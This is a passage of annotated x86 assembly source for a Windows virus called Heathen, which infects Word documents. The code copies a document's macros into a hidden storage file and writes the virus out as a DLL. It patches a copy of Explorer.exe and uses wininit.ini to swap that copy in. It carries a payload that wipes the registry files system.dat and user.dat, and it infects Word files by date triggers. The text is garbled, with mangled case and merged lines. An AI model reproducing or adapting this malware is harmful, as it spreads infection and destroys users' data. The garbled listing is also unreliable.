Call [EBP APIS.LSTRCATA]; C: WindowsHeathen.vdl
MOV ECX, Offset Aheathen_VDO
Lea Eax, [EBP Windows_Heathenvdo]
Add ECX, EBX
Push ECX
Push EAX
Call [EBP APIS.LSTRCATA]; C: WindowsHeathen.vdo
Mov Edx, Offset AwinInit_ini
Lea ECX, [EBP Windows_Wininitini]
Add Edx, EBX
Push Edx
Push ECX
Call [EBP APIS.LSTRCATA]; C: Windowswininit.inilea Eax, [EBP Windows_HTMPDOC]
Push 0; OverWrite HTMP.DOC IF ALREADY PRESENT
Push EAX
XOR ESI, ESI; ESI = 0 = File Errors
Push [EBP ACTIVEDOCUMENT]
Call [EBP APIS.copyfilea]; Copy File: ActiveDocument -> C: WindowsHtmp.doc
Test Eax, EAX
JZ Error1; Error
Lea Edx, [EBP Unicode_HTMPDoc]
Push Edx
Lea ECX, [EBP Windows_htmpdoc]
Push ECX
Call Asciiz_to_Unicode; Convert C: Windowshtmp.doc To Unicode
Add ESP, 8
Lea Eax, [EBP ISTORAGE1]
Push Eax; & iStorage1
Push 0; Zero (Reserved)
Push 0; null
Push 10h; STGM_READ STGM_SHARE_EXCLUSIVE
Push 0; null
Lea Edx, [EBP Unicode_htmpdoc]; File to Contain Storage Object
Push Edx
Call [EBP APIS.STGOPENSTORAGE]; Open iStorage1 Object
Mov Edi, EAX
Test EDI, EDI
JNZ Error2; Error
Lea Eax, [EBP Unicode_Heathenvdo]
Push EAX
Lea Edx, [EBP Windows_Heathenvdo]
Push Edx
Call Asciiz_to_Unicode; Convert C: WindowsHeathen.vdo to Unicode
Add ESP, 8
Lea ECX, [EBP ISTORAGE2]
Push Ecx; & iStorage2
Push 0; Zero (Reserved)
Push 1011h; STGM_CREATE STGM_SHARE_EXCLUSIVE STGM_WRITE
Lea Eax, [EBP Unicode_Heathenvdo]; Compound File to Create
Push EAX
Call [EBP APIS.STGCREATEDOCFILE]; CREATE Newcompound iStorage2 Object
Mov Edi, EAX
Test EDI, EDI
JNZ Error3; Error
Lea Eax, [EBP ISTREAM1]
Mov Edi, Offset AWordDocument; WordDocument Stream
Push Eax; & iStream1
Push 0; Zero (Reserved)
Push 10h; STGM_SHARE_EXCLUSIVE
Add Edi, EBX
Push 0; Zero (Reserved)
Push EDI; Name of the Stream
Mov Edx, [EBP ISTORAGE1]
Push Edx
MOV ECX, [EDX]
Call [ECX ISTORAGE_INTERFACE.OpenStream]; Open WordDocument Streampush 0; Null = DONT RETURN ACTUAL NUMBER OF BYTES READ
Lea Eax, [EBP BUFFER]
Push 200h; Number of Bytes To Read
Push Eax; Buffer for Read
MOV EDX, [EBP ISTREAM1]
Push Edx
MOV ECX, [EDX]
Call [ECX ISTREAM_ITERFACE.READ]; Read WordDocument Header
Mov Eax, Offset XTable
MOV DX, 31H; "1TABLE"
Add Eax, EBX
MOV [EBP XTABLE], EAX
TEST [EBP Buffer 0BH], 2; FWHICHTBLSTM bit
; 0 = Use 0table for Read
; 1 = USE 1TABLE for READ
Jnz Short Use1Table
DEC EDX; "0TABLE"
Use1Table:
MOV ECX, [EBP XTABLE]
MOV [ECX], DX
MOV EAX, DWORD PTR [EBP Buffer 15ah]; fccmds = offset in xtable stream of macros
MOV [EBP Macrosoffset], EAX
MOV EDX, DWORD PTR [EBP Buffer 15eh]; LCBCMDS = Size of Macros
MOV [EBP MacRossize], EDX
MOV ECX, [EBP ISTREAM1]
Push ECX
Mov Eax, [ECX]
Call [EAX ISTREAM_INTERFACE.RELEASE]; Close Stream
CMP [EBP Macrossize], 200h; Greater Than 200h?
Jg Error4
Lea EDX, [EBP ISTREAM1]; Open Another Street (Previous One Was Closed)
Push Edx; & iStream1
Push 0; Zero (Reserved)
Push 10h; STGM_SHARE_EXCLUSIVE
Push 0; Zero (Reserved)
Push [EBP XTABLE]; Name of Stream: "0table" or "1TABLE"
MOV ECX, [EBP ISTORAGE1]
Push ECX
Mov Eax, [ECX]
Call [Eax iStorage_Interface.openStream]; Open Table Stream
MOV EAX, [EBP Macrosoffset]
CDQ
MOV DWORD PTR [EBP streamseek], EAX
MOV DWORD PTR [EBP Streamseek 4], EDX
Push 0; NULL (DONT RETURN NEW POSITION)
Push 0; stream_seek_set
Push DWORD PTR [EBP streamseek 4]; Offset in Table Stream
Push DWORD PTR [EBP Streamseek] MOV EAX, [EBP ISTREAM1]
Push EAX
Mov Edx, [EAX]
Call [edx istream_interface.seek]; seek in Table Stream
Push 0; Null = DONT RETURN ACTUAL NUMBER OF BYTES READ
Lea ECX, [EBP BUFFER]
Push [EBP Macrossize]; Number of Bytes To Read
Push Ecx; buffer
MOV EAX, [EBP ISTREAM1]
Push EAX
Mov Edx, [EAX]
Call [EDX ISTREAM_INTERFACE.READ]; Read Macros from Table Stream
MOV ECX, [EBP ISTREAM1]
Push ECX
Mov Eax, [ECX]
Call [Eax istream_Interface.release]; Close Table Stream
Lea Edx, [EBP ISTREAM1]; Lets Use Same Variable for Another Stream :-)
Push Edx; & iStream1
Push 0; Zero (Reserved)
Push 0; Zero (Reserved)
Push 1011h; STGM_CREATE STGM_SHARE_EXCLUSIVE STGM_WRITE
Push EDI; Name of Stream To create: "WordDocument"
MOV ECX, [EBP ISTORAGE2]
Push Ecx; & iStorage2 (Heathen.VDO)
Mov Eax, [ECX]
Call [Eax IStorage_Interface.createStream]; Create Stream
Mov Edi, EAX
Test EDI, EDI
JNZ Error4; Error
Push 0; Null = DONT RETURN ACTUAL NUMBER OF BYTES WRITTEN
Lea Edx, [EBP BUFFER]
Push [EBP Macrossize]; Number of Bytes to Write
Push Edx
MOV ECX, [EBP ISTREAM1]
Push ECX
Mov Eax, [ECX]
Call [eax istream_interface.write]; iStream: Write
MOV EDX, [EBP ISTREAM1]
Push Edx
MOV ECX, [EDX]
Call [ECX ISTREAM_INTERFACE.RELEASE]; Close Stream
Mov Eax, Offset Amacros; Name of Element to Move
Add Eax, EBX
Push 1; STGMOVE_COPY (DONT MOVE, ONLY COPY)
Push EAX
Push [EBP ISTORAGE2]; Destination Storage Object (Heathen.VDO)
Push EAX
Mov Edx, [EBP ISTORAGE1]; Source IStorage Interface (HTMP.DOC)
Push Edx
MOV ECX, [EDX]
Call [ECX ISTORAGE_INTERFACE.MOVEELEMENTTO]; Move Macrosmov Edi, EAX
Test EDI, EDI
Jnz Short Error4
Push 0; null
Push 20h; file_attribute_archive
Push 2; Create_ALWAYS
Push 0; null = handle cannot be inherited
PUSH 0; 0 = prevent file from being shared
Lea Eax, [EBP Windows_heathevdl]; "c: windowsheathen.vdl"
Push 40000000H; Generic_Write
Push EAX
Call [EBP APIS.CREATEFILEA]; CREATE DLL File (That Will Be Called from Explorer Patch Code)
MOV [EBP FILEHANDLE], EAX
CMP [EBP FILEHANDLE], 0FFFFFFFH
JZ Short Error4; File Creation Error
Push 0; null
Lea Edx, [EBP WRITTENBYTES]]
Push Edx
Push 3000H; Number of Bytes to Write
Push [EBP Heathen_Base]; Buffer for Write
Push [EBP FILEHANDLE]; File Handle
Call [EBP APIS.WRITEFILE]; WRITE VIRUS AS A DLL FILE :-D
Mov Edi, EAX
Push [EBP FILEHANDLE]
Call [EBP APIS.CLOSEHANDLE]; Close File
Test EDI, EDI
JZ Short Error4; Error
Push 0; Overwrite Heathen.Vex if Already Present
Lea Eax, [EBP Windows_heathenVex]
Push EAX
Lea Edx, [EBP Windows_Explorerexe]
Push Edx
Call [EBP APIS.COPYFILEA]; COPY FILE: C: Windows Explorer.exe -> C: WindowsHeathen.Vex
Mov ESI, ESI ESI = 0 Means Errors
Error4:
MOV EAX, [EBP ISTORAGE2]
Push EAX
Mov Edx, [EAX]
Call [EDX ISTORAGE_INTERFACE.RELEASE]; Close ISTORAGE2 (Heathen.VDO)
Error3:
MOV ECX, [EBP ISTORAGE1]
Push ECX
Mov Eax, [ECX]
Call [Eax IStorage_Interface.release]; Close IStorage1 (HTMP.DOC)
Error2:
Lea Edx, [EBP Windows_HTMPDoc]
Push Edx
Call [EBP APIS.DELETEFILEA]; DELETE TEMPORARY FILE C: Windowshtmp.doc
Error1:
Test ESI, ESI; ERRORS?
JZ Short Error0; YES :-(
Push [EBP PATCH_CODE]; Offset of code to be inserted in Explorer.exemov ECX, Offset akernel32_dll
Mov Eax, Offset ALOADLIBRARYA
Add ECX, EBX
Add Eax, EBX
Push ECX; "kernel32.dll"
Push Eax; "LoadLibrarya"
Lea Edx, [EBP Windows_heathenVex]
LEA ECX, [EBP APIS]; API Addresses
Push Edx
Push ECX
Call PatchExplorer; Patch C: Windowsheathen.Vex
Add ESP, 14h
Test Eax, EAX
JZ Short Error0; Error Patching File
Push Ebx; EBX = Delta
Lea Eax, [EBP Windows_heathenVex]
Push EAX
Lea Edx, [EBP Windows_Explorerexe]
Push Edx
Lea ECX, [EBP Windows_Wininitini]
Push ECX
LEA EAX, [EBP APIS]; API Addresses
Push EAX
Call CreatewinInit; Create C: Windowswininit.ini File To Replace Explorer.exe
Add ESP, 14h
Error0:
POP EDI
POP ESI
POP EBX
MOV ESP, EBP
POP EBP
Retn 1ch
Installvirus Endp
; --------------- Subroutine --------------------------------- --------
Attributes: bp-based frame
Alloc_Memory Proc Near
Size = DWORD PTR 8
Push EBP
MOV EBP, ESP
MOV Eax, DS: MemoryAllocator
Push [EBP SIZE]; SIZE OF MEMORY TO ALLOCATE
Push EAX
Mov Edx, [EAX]
Call [EDX IMALLOC_INTERFACE.PREALLOC]; Allocate Memory
POP EBP
Retn
Alloc_Memory Endp
; --------------- Subroutine --------------------------------- --------
Attributes: bp-based frame
Free_MEMORY Proc Near
Buffer = DWORD PTR 8
Push EBP
MOV EBP, ESP
MOV EAX, [EBP BUFFER]
Test Eax, EAX
JZ Short Free_Memory0
Push EAX
MOV Eax, DS: MemoryAllocator
Push EAX
Mov Edx, [EAX]
Call [EDX IMALLOC_INTERFACE.PREFREE]; Free Memory
Free_MEMORY0:
POP EBP
Retn
Free_MEMORY ENDP
; --------------- Subroutine --------------------------------- --------
Attributes: bp-based frameadddirectorytolist proc near
Laststruct = DWORD PTR-4
DirectoryList = DWORD PTR 8
NewDirectory = DWORD PTR 0CH
Push EBP
MOV EBP, ESP
Push ECX
Push EBX
PUSH ESI
Push EDI
MOV EDI, [EBP NewDirectory]; Name of New Directory to Insert On List
MOV EBX, [EBP DIRECTORYLIST]; EBX = Pointer to Structure Corresponding to Last Directory In List
MOV EAX, [EBX]; Get Next Directory Structure
MOV [EBP Laststruct], EAX; Next Directory Structure
Push 8
Call Alloc_memory; Get Memory for New Directory Structure
POP ECX
Mov ESI, EAX
MOV [EBX], ESI; Save IT, SO this New Structure Will Be First in Chain
Test ESI, ESI
JNZ Short AddddiRectory
XOR EAX, EAX
JMP Short Error50; Error Allocating Memory
; ------------------------------------------------- ----------------------------
AddDIRECTORY:
Push EDI
Call API_LSTRLENA; Get Size Of Directory Name
INC EAX
Push EAX
Call alloc_memory; reserve memory for That Directory Name
Mov ESI, EAX
MOV EAX, [EBX]
POP ECX
Test ESI, ESI
MOV [Eax DirectoryStruc.directoryName], ESI; Save In First Field of Structure The Name of The Directory
Jnz Short AddDirectory2
XOR EAX, EAX
JMP Short Error50; Error Allocating Memory
; ------------------------------------------------- ----------------------------
AddDirectory2:
Push EDI
PUSH ESI
Call API_LSTRCPYA; COPY DIRECTORY NAME TO RESERVED MEMORY
Mov Edx, [EBX]
MOV ECX, [EBP Laststruct]
MOV [Edx DirectoryStruc], ECX; Save Next Directory Structure In Second Field of Actual Structure
MOV Eax, 1
Error50:
POP EDI
POP ESI
POP EBX
POP ECX
POP EBP
Retn
AddDirectoryTolist Endp
; --------------- Subroutine --------------------------------- ------; Attributes: bp-based frame
DeletedIRectoryFromList Proc Near
NextDirectoryStruc = DWORD PTR 8
DirectoryName = DWORD PTR 0CH
Push EBP
MOV EBP, ESP
Push EBX
PUSH ESI
MOV EBX, [EBP NextDIRECTORYSTRUC]; EBX = Pointer to Directory Structure
MOV Eax, [EBX]; EAX = Directory Structure
Mov ESI, [Eax DirectoryStruc.nextdiRectoryStruc]; ESI = Next Directory Structure
Push [Eax DirectoryStruc.directoryName]; Name of the Directure (in this Directory Structure)
Push [EBP DIRECTORYNAME]; Pointer TO Argument DirectoryName (To Return Name of Directory)
Call API_LSTRCPYA; COPY DIRECTORY NAME TO ARGUMENT DIRECTORYNAME
MOV EAX, [EBX]
Push [Eax DirectoryStruc.directoryName]
Call Free_Memory; Free Memory That Contains The Name of The Directory
POP ECX
Push DWORD PTR [EBX]
Call Free_Memory; Free Memory of this Directory Structure
POP ECX
MOV [EBX], ESI; UPDATE DIRECTORYLIST
POP ESI
POP EBX
POP EBP
Retn
DELETEDIRECTORYFROMLIST ENDP
; --------------- Subroutine --------------------------------- --------
Called from WndProc
PayLoad Proc Near
Byteswritten = byte PTR-518H
Windows_wininit = byte PTR-514H
String_text = byte Ptr-3e8h
Push EBX
Add ESP, 0FFFFFAE8H
Push Offset WindowsDirectory
Lea Eax, [ESP 51CH Windows_Wininit]
Push EAX
Call API_LSTRCPYA
Push Offset AwinInit_ini
Lea edx, [ESP 51CH Windows_Wininit]
Push Edx
Call API_LSTRCATA; "C: Windowswininit.ini"
Push 0; null
Push 20h; file_attribute_archive
Push 2; Create_ALWAYS
Push 0; null = file handle cannot be inherited
PUSH 0; 0 = prevent file from being shared
Push 40000000H; Generic_WriteLea ECX, [ESP 530H Windows_Wininit]
Push ECX
Call API_CREATEFILEA; CREATE FILE
MOV EBX, EAX
Push Offset WindowsDirectory
Push Offset WindowsDirectory
Push Offset WindowsDirectory
Push Offset WindowsDirectory
Push Offset Arename
Push offset arename2
Lea Eax, [ESP 530H String_Text]
Push EAX
Call api_wsprintfa; Generate Following Text ...
[rename]
NUL = C: Windowssystem.dat
NUL = C: windowsuser.dat
NUL = C: Windowssystem.da0
NUL = C: windowsuser.da0
;
Add ESP, 1CH
Push 0; null
Lea EDX, [ESP 51CH BYTESWRITTEN]
Push Edx; Pointer to Store Number of Bytes Actually Written To File
Lea ECX, [ESP 520H String_Text]
Push ECX
Call API_LSTRLENA; Get Size of the String
Push Eax; Number of Bytes to Write
Lea Eax, [ESP 524H String_Text]
Push Eax; Text
Push Ebx; File Handle
Call api_writefile; write to wininit.ini
Push EBX
Call API_CloseHandle; Close File Handle
Add ESP, 518H
POP EBX
Retn
PayLoad Endp
; --------------- Subroutine --------------------------------- --------
INITVARIABLES PROC NEAR
IStorage1 = byte PTR -1A4H
FILEPOINTER = Qword PTR-1A0h
Windows_heathenvdo = byte PTR-198H
Statstg = DWORD PTR-6CH
IStorageTime = Word PTR-24H
SystemTime = Word PTR-14H
Push EBX
Add ESP, 0FFFFFE60H
XOR EBX, EBX
PUSH 12CH
Push Offset WindowsDirectory
Call API_GetWindowsDirectorya; Get Windows Directory
Push Offset WindowsDirectory
Lea Eax, [ESP 1A8H Windows_Heathenvdo]
Push EAX
Call API_LSTRCPYA
Push offset aheathen_vdo
Lea Edx, [ESP 1A8H Windows_Heathenvdo]
Push Edx
Call API_LSTRCATA; "C: Windowsheathen.vdo"
Push Offset Unicode_Heathenvdo
Lea ECX, [ESP 1A8H Windows_Heathenvdo] Push ECX
Call Asciiz_to_Unicode; Convert it to unicode (for use by ole functions)
Add ESP, 8
Push ESP; & iStorage1
Push 0; Zero (Reserved)
Push 0; null
Push 10h; STGM_READ STGM_SHARE_EXCLUSIVE
Push 0; null
Push Offset Unicode_Heathenvdo
Call API_STGOPENSTORAGE; Open Storage Heathen.vdo
Test Eax, EAX
JNZ Error20
Push Offset iLockBytes; WHERE ILOCKBYTES Interface is returned
Push 1; True = free handle when Object is released
Push 0; null = allocate a new shared memory block of size zero
Call api_createilockbytesonhglobal; crete a byte array object this allows to use use global memory as the physical device (instead of disk file)
Test Eax, EAX
JNZ Error21
Push Offset IStorage; & iStorage
Push 0; null
Push 1012H; STGM_CREATE STGM_SHARE_EXCLUSIVE STGM_READWRITE
Push DS: iLockBytes; iLockBytes Interface on the byte array object
Call API_STGCREATEDOCFILECKBYTES; CREATES A New Com File Storage Object On Top of the Byte Array Object
Test Eax, EAX
JNZ Error21
Push DS: iStorage; Destination iStorage (on memory)
Push 0; null
Push 0; null = all Objects to be copied
Push 0; null
MOV EAX, DWORD PTR [ESP 1B4H ISTORAGE1]
Push Eax; Source Istorage (Heathen.VDO)
Mov Edx, [EAX]
Call [EDX ISTORAGE_INTERFACE.COPYTO]; COPY All ITS Contents
Test Eax, EAX
Jnz Short Error21
Push Offset Istream; & iStream
Push 0; Zero (Reserved)
Push 10h; STGM_SHARE_EXCLUSIVE
Push 0; Zero (Reserved)
Push Offset AWordDocument; WordDocument Stream (Where Virus Macros Were Stored)
Mov ECX, DS: iStorage
Push ECX
Mov Eax, [ECX]
Call [EAX ISTORAGE_INTERFACE.OPENSTREAM]; Open That Stream
Test Eax, EAX
Jnz Short Error21Mov DWORD PTR [ESP 1A4H FilePointer], 0
MOV DWORD PTR [ESP 1A4H FilePointer 4], 0
Push Offset Heathenmacrossize; Here Will Be Stored Size of WordDocument Stream, That Contains Virus Macros !!!
Push 2; stream_seek_end
Push DWORD PTR [ESP 1ACH FILEPOINTER 4]
Push DWORD PTR [ESP 1B0H FilePointer]
MOV ECX, DS: istream
Push ECX
Mov Eax, [ECX]
Call [EAX ISTREAM_INTERFACE.SEEK]; seek at end of stream = size of stream
Push 0; NULL (DONT RETURN NEW POSITION)
Push 0; stream_seek_set
Push DWORD PTR [ESP 1ACH FILEPOINTER 4]
Push DWORD PTR [ESP 1B0H FilePointer]
MOV ECX, DS: istream
Push ECX
Mov Eax, [ECX]
Call [EAX ISTREAM_INTERFACE.SEEK]; Seek At Start of Stream
MOV EBX, 1; OK, NO Errors :)
Error21:
Push 1; statflag_noname
Lea Eax, [ESP 1A8H STATSTG]
Push Eax; & statsTG
MOV EDX, DWORD PTR [ESP 1ACH ISTORAGE1]; Heathen.vdo Storage
Push Edx
MOV ECX, [EDX]
Call [ECX ISTORAGE_INTERFACE.STAT]; Get Stat Structure of the iStorage
Lea Eax, [ESP 1A4H iStorageTime]; Variable to Store IStorage Modification Time (Converted to SystemTime)
Push EAX
Lea EDX, [ESP 1A8H Statstg 10h]; Mtime = Modification Time
Push Edx
Call API_FileTimetosystemTime; Converts a 64-bit File Time To System Time Format
Lea ECX, [ESP 1A4H SystemTime]; & SystemTime
Push ECX
Call API_GetsystemTime; Get System Time
Movzx Eax, [ESP 1A4H SystemTime 6]; System Day, SYSTEM DAY
Movzx EDX, [ESP 1A4H IStorageTime 6]; iStorage Day
Sub Eax, EDX; DAY DIFMERENCE
Movzx EDX, [ESP 1A4H IStorageTime 2]; iStorage Month
Movzx ECX, [ESP 1A4H SystemTime 2]; System Monthsub ECX, EDX; MONTH DIFCERENCE
Imul ECX, 1EH; * 30 Days / Month
Add eax, Ecx; Add Days
Movzx ECX, [ESP 1A4H ISTORAGETIME]; iStorage Year
Movzx EDX, [ESP 1A4H SystemTime]; System Year
Sub EDX, ECX; Year Difference
Imul EDX, 16DH; * 365 Days / Year
Add Eax, EDX; Add Days
CMP Eax, 183; 183 Days (or more) SINCE INSTALLATION? (Half a year)
SetNL Al
And Eax, 1; EAX = 1 -> Yes! :-D
CMP [ESP 1A4H SystemTIME 6], 0EH; DAY 14?
Mov DS: Morethanhalfyear, EAX
JNZ Short Not_May14th; NO
CMP [ESP 1A4H SystemTIME 2], 5; Month = May?
JZ Short Month14th; YES
NOT_MAY14TH:
XOR ECX, ECX
JMP short is_may14th
; ------------------------------------------------- ----------------------------
MONTH14TH:
MOV ECX, 1
IS_MAY14TH:
MOV DS: May14h, Ecx; Indicate IF WE Are ON May 14th
MOV Eax, DWORD PTR [ESP 1A4H ISTORAGE1]
Push EAX
Mov Edx, [EAX]
Call [EDX ISTORAGE_INTERFACE.RELEASE]; Close IStorage
Error20:
MOV EAX, EBX
Add ESP, 1A0H
POP EBX
Retn
INITVARIABLES ENDP
; --------------- Subroutine --------------------------------- --------
InitDirectoryList Proc Near
IStream1 = DWORD PTR -1CH
ZERO_OFFSET = QWORD PTR-18H
Scandatasize = byte PTR-10H
Push EBX
PUSH ESI
Add ESP, 0FFFFFCH
XOR EAX, EAX
MOV DS: Drive, EMPTY DIRECTORYLIST
XOR EDX, EDX
Mov DS: DirectoryList.NextDirectoryStruc, EDX
Mov DS: DirectoryList.directoryName, EDX
Push ESP; & ISTREAM1
Push 0; Zero (Reserved)
Push 10h; STGM_SHARE_EXCLUSIVE
Push 0; Zero (Reserved)
Push Offset Ascandata; Name of Stream "Scandata"
Mov Eax, DS: iStorage; (iStorage Based On iLockBytes Interface)
Push Eaxmov ECX, [EAX]
Call [ECX iStorage_Interface.OpenStream]; Open Street Scandata
Test Eax, EAX
JNZ Error40; Error
MOV DWORD PTR [ESP 1CH ZERO_OFFSET], 0; Offset from End of Stream = 0
MOV DWORD PTR [ESP 1CH ZERO_OFFSET 4], 0
Lea Eax, [ESP 1CH ScandataSize]
Push EAX
Push 2; stream_seek_end
Push DWORD PTR [ESP 24h ZERO_OFFSET 4]
Push DWORD PTR [ESP 28H ZERO_OFFSET]
MOV ECX, [ESP 2CH ISTREAM1]
Push ECX
Mov Eax, [ECX]
Call [EAX ISTREAM_ITERFACE.SEEK]; seek to end of stream to calculate its size
Push 0; NULL (DONT RETURN NEW POSITION)
Push 0; stream_seek_set
Push DWORD PTR [ESP 24h ZERO_OFFSET 4]
Push DWORD PTR [ESP 28H ZERO_OFFSET]
MOV ECX, [ESP 2CH ISTREAM1]
Push ECX
Mov Eax, [ECX]
Call [EAX ISTREAM_INTERFACE.SEEK]; Go to Start of Stream
Push DWORD PTR [ESP 1CH Scandatasize]; SIZE OF Actual Scandata
Call Alloc_Memory; Reserve Memory for Those Structures
POP ECX
Mov ESI, EAX
Test ESI, ESI
JZ Short Error41; Error Allocating Memory
PUSH 0
Push DWORD PTR [ESP 20H Scandatasize]; SIZE OF Scandata
Push ESI; buffer
Mov Eax, [ESP 28H ISTREAM1]
Push EAX
Mov Edx, [EAX]
Call [edx istream_interface.read]; read scandata
MOV ECX, [ESI]; Get Disk Drive Od Directory Where IT WAS STOPPED
MOV DS: Drive, Ecx; Save It to Continue In That Directory
Lea EBX, [ESI 4]
JMP Short Createlist
; ------------------------------------------------- ----------------------------
Createlist2:
Push Ebx; Offset Of Directory Name
Push Offset DirectoryList; Directory List
Call AdddiRectoryTOList; add this directory to DirectoryList
Add ESP, 8
Test Eax, EAX
JZ Short Error42; EXIT ON Errorpush EBX
Call API_LSTRLENA; Get Size Of Directory Name
INC EAX
Add Ebx, EAX; Point To Next Directory
Createlist:
CMP DWORD PTR [EBX], 0FFFFFFFH; END OF DIRECTORIES?
Jnz Short Createlist2; Not Yet
Error42:
PUSH ESI
Call Free_Memory; Free Memory of Scandata, Although DirectoryList Structures Remain in Memory To Work with Them
POP ECX
Error41:
MOV EAX, [ESP 1CH ISTREAM1]
Push EAX
Mov Edx, [EAX]
Call [edx istream_interface.release]; Close Stream
Error40:
Add ESP, 14h
POP ESI
POP EBX
Retn
InitDirectoryList Endp
; --------------- Subroutine --------------------------------- --------
UpdateScandata Proc Near
IStorage = DWORD PTR-13CH
IStream_scandata = DWORD PTR-138H
Endmark = byte PTR-134H
DirectoryName = byte PTR-130H
Push EBX
Add ESP, 0FFFFEC8H
Push ESP; & iStorage (ESP 13CH ISRAGE)
Push 0; Zero (Reserved)
Push 0; null
Push 11h; STGM_WRITE STGM_SHARE_EXCLUSIVE
Push 0; null
Push Offset Unicode_Heathenvdo
Call API_STGOPENSTORAGE; Open Storage Heathen.vdo
MOV EBX, EBX; EBX = 0 if no errors
Test EBX, EBX
JNZ Error60
Lea Eax, [ESP 13CH ISTREAM_SCANDATA]; & ISTREAM_SCANDATA
Push EAX
Push 0; Zero (Reserved)
Push 0; Zero (Reserved)
Push 1011h; STGM_CREATE STGM_SHARE_EXCLUSIVE STGM_WRITE
Push Offset Ascandata; Name of Stream
MOV EDX, [ESP 150H IStorage]
Push Edx
MOV ECX, [EDX]
Call [ECX ISTORAGE_INTERFACE.CREATESTREAM]; Open Scandata Stream
MOV EBX, EAX
Test EBX, EBX
Jnz Short Error62
MOV DWORD PTR [ESP 13CH Endmark], 0FFFFFFFH; Indicate "End Of Director"
Push 0; null = not interested in number of bytes actually written to streampush 4; Number of bytes to write to stream
Push Offset Drive; Drive Unit That We Are Currently Scanning
MOV EAX, [ESP 148H ISTREAM_SCANDATA]
Push EAX
Mov Edx, [EAX]
Call [EDX ISTREAM_INTERFACE.WRITE]; ISTREAM: WRITE
OR EBX, EX; Errors, EBX WILL BE DIFFERENT OF ZERO
JMP Short Check_more_directories
; ------------------------------------------------- ----------------------------
GET_MORE_DIRECTORIES:
Lea ECX, [ESP 13CH DIRECTORYNAME]
Push ECX
Push Offset DirectoryList
Call deletedirectoryFromList; Get Next Directory from List (and free it from list)
Add ESP, 8
Push 0; null = not interested in number of bytes actually Written to Stream
Lea Eax, [ESP 140H DirectoryName]
Push EAX
Call API_LSTRLENA
Inc Eax; One Byte More, To include be an asciiz string
Push Eax; Number of Bytes To Write to Stream
Lea EDX, [ESP 144H DirectoryName]; Name of Directory
Push Edx
MOV ECX, [ESP 148H ISTREAM_SCANDATA]
Push ECX
Mov Eax, [ECX]
Call [EAX ISTREAM_INTERFACE.WRITE]; WRITE DIRECTORY NAME to stream
OR EBX, EAX
Check_more_directories:
CMP DS: DirectoryList.directoryName, 0; More Director IN LIST?
Jnz short get_more_directories; yeah! go for them!
Push 0; null = not interested in number of bytes actually Written to Stream
Push 4; Number of Bytes to Write to Stream
Lea EDX, [ESP 144H Endmark]; Offset of 0xffffffff to Be Written At End of Directories
Push Edx
MOV ECX, [ESP 148H ISTREAM_SCANDATA]
Push ECX
Mov Eax, [ECX]
Call [Eax istream_Interface.write]; Write Mark
OR EBX, EAX
MOV EDX, [ESP 13CH ISTREAM_SCANDATA]; istream
Push EDXMOV ECX, [EDX]
Call [ECX ISTREAM_INTERFACE.RELEASE]; Close Stream
Error62:
Test EBX, EBX
JZ Short Error61; JUMP if no errors!
MOV EAX, [ESP 13CH ISRAGE]
Push EAX
Mov Edx, [EAX]
Call [edx iStorage_Interface.revert]; Discard All Changes !!!
Error61:
MOV ECX, [ESP 13CH ISRAGE]
Push ECX
Mov Eax, [ECX]
Call [eax iStorage_Interface.release]; Close IStorage
Error60:
Add ESP, 138H
POP EBX
Retn
UpdateScandata ENDP
; --------------- Subroutine --------------------------------- --------
Attributes: bp-based frame
InfectDocument Proc Near
Buffer = byte PTR-4BCH
Statg = statG_struc ptr-2bch
Unicode_filename = byte PTR-274H
Macrosoffset = DWORD PTR -1CH
Seekoffset = Qword PTR-14H
ISTREAM2 = DWORD PTR-0CH
IStream1 = DWORD PTR-8
IStorage1 = DWORD PTR-4
Asciiz_FileName = DWORD PTR 8
Push EBP
MOV EBP, ESP
Add ESP, 0FFFFFB44H
CMP DS: May14h, 0; May 14th?
Push EBX
PUSH ESI
MOV EBX, [EBP ASCIZ_FILENAME]
JZ short infect_this_file; jump if not may 14th
XOR ECX, ECX
XOR EAX, EAX
JMP Short Check_directory_name
; ------------------------------------------------- ----------------------------
Next_Character:
Movsx EDX, DL
CMP EDX, ''
Jnz Short Next_Character2
LEA ECX, [EAX 1]; ECX = Offset after "" (Offset of Name of Subdirectory or File)
Next_character2:
Inc Eax; Next Byte
Check_directory_name:
MOV DL, [EBX EAX]
TEST DL, DL
JNZ Short Next_Character; Search To End of Directory Name
Movsx Eax, Byte PTR [EBX ECX]; Get First Character of Subdirectory Name
CMP EAX, '_'
JZ Short Infect_this_file; on Mat 14th ... Only Infects Files Starting with "_" !!!
XOR Eax, Eaxjmp Error70
; ------------------------------------------------- ----------------------------
Infect_this_file:
XOR ESI, ESI; ESI = 0 means infection not successssful
Lea EAX, [EBP Unicode_FileName]
Push EAX
Push EBX
Call Asciiz_to_Unicode; Convert It To Unicode String
Add ESP, 8
Lea EDX, [EBP ISTORAGE1]; & iStorage
Push Edx
Push 0; Zero (Reserved)
Push 0; null
Push 12h; STGM_Readwrite STGM_SHARE_EXCLUSIVE
Push 0; null
LEA ECX, [EBP Unicode_FileName]
Push ECX
Call API_STGOpenStorage; Open Document
Test Eax, EAX
JNZ Error71; EXIT ON Error
Push 1
Lea Eax, [EBP statG]; WHERE statG structured will be returned
Push EAX
Mov Edx, [EBP ISTORAGE1]; ISTORAGE OF THE Document
Push Edx
MOV ECX, [EDX]
Call [ECX ISTORAGE_INTERFACE.STAT]; Get Statg Structure for this Storage Object
Lea Eax, [EBP ISTREAM1]; & ISTREAM1
Push EAX
Push 0; Zero (Reserved)
Push 12h; STGM_Readwrite STGM_SHARE_EXCLUSIVE
Push 0; Zero (Reserved)
Push Offset AWORDDocument; Name of Stream "WordDocument"
Mov Edx, [EBP ISTORAGE1]
Push Edx
MOV ECX, [EDX]
Call [ECX ISTORAGE_INTERFACE.OpenStream]; Open Stream
Test Eax, EAX
JNZ Error72
Push 0; null = NOT INTERESTED in Number of Bytes Actually Read from Stream
Lea Eax, [EBP BUFFER]
Push 200h; Number of Bytes To Read
Push eax; buffer
MOV EDX, [EBP ISTREAM1]; ISTREAM
Push Edx
MOV ECX, [EDX]
Call [ECX ISTREAM_ITERFACE.READ]; Read WordDocument Header
CMP DWORD PTR [EBP BUFFER 15EH], 3
JGE Error73; EXIT IF IT Already Has Macros
MOV AX, 31H; SELECT 1TABLE
TEST [EBP BUFFER 0BH], 2; 0TABLE OR 1TABLE?
Jnz Short Select_1Table
Dec Eax; SELECT 0TABLE
SELECT_1TABLE: MOV Word PTR DS: XTable, AX
Lea Edx, [EBP ISTREAM2]; & ISTREAM2
Push Edx
Push 0; Zero (Reserved)
